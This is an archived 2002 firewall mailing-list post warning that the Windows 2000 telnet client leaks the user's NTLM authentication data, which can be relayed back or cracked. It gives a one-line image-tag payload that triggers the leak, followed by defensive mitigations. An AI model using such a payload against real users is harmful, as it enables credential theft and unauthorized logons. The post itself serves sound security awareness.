Re: [fw-wiz] Danger of telnet on w2k (Was: re: Annoying pop-ups)

From: Mikael Olsson (
Date: 10/30/02

From: Mikael Olsson <>
Date: Wed Oct 30 14:20:02 2002

Mikael Olsson wrote:
> PLUS port 23 (Telnet!)
> Sure, it isn't on by default, but people found ways to abuse DCOM to
> turn it on remotely. Uh oh.

I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth
in telnet in w2k. This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the
currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used
to log on to you without delay. It can also be fed to l0phtcrack.

Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this. All it needs is an image tag like
<img src="telnet://">

Stuff that can help:

- Read
  and install patch. The patch is to display a warning before NTLM
  is sent to stuff outside the local zone. However, we have seen the zone
  schemes be subverted before, so don't rely on it.

- Block port 23 inbound to avoid the direct relay back to your telnet
  port. Disabling the telnet service might be a good idea, but don't
  rely on it.

- Run "telnet" without arguments. Type "unset ntlm".
  This prevents the telnet client from sending ntlm hashes at all.

- Blocking port 23 outbound will NOT help.

Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW:
Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."